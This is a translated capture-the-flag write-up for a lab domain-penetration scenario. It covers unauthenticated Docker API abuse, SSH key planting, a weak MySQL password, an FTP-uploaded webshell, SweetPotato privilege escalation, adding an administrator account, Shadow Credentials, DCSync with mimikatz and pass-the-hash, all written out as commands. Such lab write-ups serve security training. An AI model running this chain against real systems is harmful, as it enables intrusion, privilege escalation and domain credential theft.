Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Unauthorized Writeup

Instructions

Unauthorized is a shooting range environment with medium difficulty. Completing this challenge can help players understand the technical methods of proxy forwarding, intranet scanning, information collection, privilege escalation and lateral movement in intranet penetration, strengthen their understanding of the core authentication mechanism of the domain environment, and master some interesting technical points in the domain environment penetration. There are 3 flags in the shooting range, distributed in different target machines.

Technology

FTP, Privilege Elevation, AD CS, Kerberos, Domain Penetration

First flag

docker not authorized

Collected through external network information, it was found that docker was not authorized

https://cloud.tencent.com/developer/article/1744943

View the mirror

docker -H tcp://47.92.7.138:2375 images View container

docker -H tcp://47.92.7.138:2375 ps -a Start the container and mount the host disk to /mnt

docker -H tcp://47.92.7.138:2375 run -it -v /:/mnt --entrypoint /bin/bash ubuntu:18.04

Write the public key

Generate a key on vps. After pressing Enter, there will be 3 interactions. The first one is the file name, which is id_rsa by default. If you need to modify it, enter a file name yourself. The second and third are passwords and confirmation passwords, which are the passwords to be entered when using the public key in the future. They are generally not set. If there are strong security needs, you can set them yourself. Finally, two files id_rsa, id_rsa.pub will be generated. The ending of .pub is the public key and the other is the private key

ssh-keygen -t rsa Write the public key to the /root/.ssh/authorized_keys file of the target machine host

cd /mnt/root/.ssh/

echo 'ssh-rsa AAAAB3NzaC1yc2..' authorized_keys You can log in to ssh directly with the private key locally

Look up the flag, prompting that the flag is not here

mysql weak password

View the open port of this machine

netstat -aptn Check the historical command and find that the mysql password is 123456. In fact, it can also be blasted.

history Access mysql database

mysql -uroot -p123456

mysql show databases;

mysql use secret;

mysql show tables;

mysql select * from f1agggg01 gets the first flag

‍Second flag

Handalone penetration

Upload npc settings proxy, fscan scan 172.22.7.0/24

172.22.7.67:8081 open

172.22.7.13:80 open

172.22.7.13:22 open

172.22.7.67:445 open

172.22.7.31:445 open

172.22.7.67:21 open

172.22.7.6:445 open

172.22.7.67:80 open

172.22.7.67:139 open

172.22.7.31:139 open

172.22.7.6:139 open

172.22.7.31:135 open

172.22.7.67:135 open

172.22.7.6:135 open

172.22.7.6:88 open

172.22.7.13:2375 open

[+] NetInfo:

[*]172.22.7.6

[-]DC02

[-]172.22.7.6

[*] 172.22.7.67 XIAORANG\WIN-9BMCSG0S

[*] WebTitle:http://172.22.7.13 code:200 len:27170 title:XX Decoration

[+] NetInfo:

[*]172.22.7.67

[-]WIN-9BMCSG0S

[-]172.22.7.67

[+] NetInfo:

[*]172.22.7.31

[-]ADCS

[-]172.22.7.31

[*] 172.22.7.31 XIAORANG\ADCS

[*] 172.22.7.6 [+]DC XIAORANG\DC02

[*] WebTitle:http://172.22.7.13:2375 code:404 len:29 title:None

[+] ftp://172.22.7.67:21:anonymous

[-]1-1P3201024310-L.zip

[-]1-1P320102603C1.zip

[-]1-1P320102609447.zip

[-]1-1P320102615Q3.zip

[-]1-1P320102621J7.zip

[-]1-1P320102J30-L.zip

[*] WebTitle:http://172.22.7.67 code:200 len:703 title:IIS Windows Server

[*] WebTitle:http://172.22.7.67:8081 code:200 len:4621 title3: Company management backend

[+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce

[+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file

[+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak

FTP not authorized

http://172.22.7.67:8081/www.zip backup compressed package. After decompression, it was found that the download folder is consistent with the shared file of the ftp logged in anonymously

Therefore, webshell can be uploaded through ftp

shell address

http://172.22.7.67:8081/download/shell.asp Directly use potatoes to increase rights and upload SweetPotato.exe

SweetPotato.exe -a 'whoami' After testing, 3389 is enabled. Add an account directly and log in

SweetPotato.exe -a 'net user devyn Admin@123 /add'

SweetPotato.exe -a 'net localgroup administrators devyn /add' Get flag

‍The third flag

Note that this newly created user cannot execute the domain command, so you need to query the domain account and then log in with PTH. If you find the password, you can log in directly. In fact, you can directly execute mimikatz in the shell to grab the Hash. The remote desktop here is more convenient to use cmd to execute.

Crawled the domain account zhangfeng/FenzGTaVF6En, log in again with the domain account, note that the user name must be filled in [email protected]

shadow-credentials

https://wiki.whoamianony.top/active-directory-methodology/shadow-credentials

The following accounts have write permissions to the msDS-KeyCredentialLink property:

Domain Administrator Accounts Key Admins Group Accounts Enterprise Key Admins Group Accounts with GenericAll or GenericWrite permissions to objects in Active Directory Machine accounts have write permissions to their msDS-KeyCredentialLink property zhangfeng Accounts In the Key Admins group, have write permissions

Add Shadow Credentials to the msDS-KeyCredentialLink property of the domain controller

Whisker.exe add /target:DC02$ /domain:xiaorang.lab /dc:DC02.xiaorang.lab After the addition is successful, the program prompts the command to request the TGT ticket based on the certificate authentication. Note that the prompt command is added to /ptt at the end

Domain controller account has privileges, and can use Mimikatz to execute DCSync to export domain hash

mimikatz.exe 'privilege:debug' 'lsadump:dcsync /domain:xiaorang.lab /user:Administrator' exit

Hash pass

proxychains python3 wmiexec.py -hashes 00000000000000000000000000000000:bf967c5a0f7256e2eaba589fbd29a382 [email protected] Original link: https://zhuanlan.zhihu.com/p/581451146